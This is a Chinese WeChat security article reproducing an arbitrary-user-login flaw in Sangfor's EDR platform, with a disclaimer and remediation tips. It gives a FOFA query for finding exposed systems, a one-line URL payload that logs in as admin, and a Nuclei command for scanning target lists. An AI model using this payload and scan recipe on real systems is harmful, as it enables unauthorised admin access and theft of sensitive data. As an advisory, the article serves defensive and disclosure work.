点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
该EDR系统存在任意用户登录漏洞,攻击者通过漏洞可以登录系统后台并获取服务器的敏感信息。
0x03
漏洞复现
Vulnerability Recurrence
fofa:title="终端检测响应平台"
执行如下POC,可直接通过以admin权限登录后台,进而获取敏感信息。
{{BaseURL}}/ui/login.php?user=admin
其中BaseURL为目标漏洞平台的实际地址或域名
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t Sangfor_login_Any_user_login.yaml -l Sangfor_login_Any_user_login_Subs.txt
--------------------------------------------
Sangfor_login_Any_user_login_Subs.txt可以结合实际情况自定义
--------------------------------------------
2.Nuclei的运行截图如下:
3.关注公众号获取脚本并回复:深信服EDR
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
2023-02-23
2023-02-11
2023-05-05
2023-05-16
2023-05-31
2023-06-02
END
原文始发于微信公众号(数字人才创研院):漏洞复现|深信服科技EDR平台存在任意用户登录漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论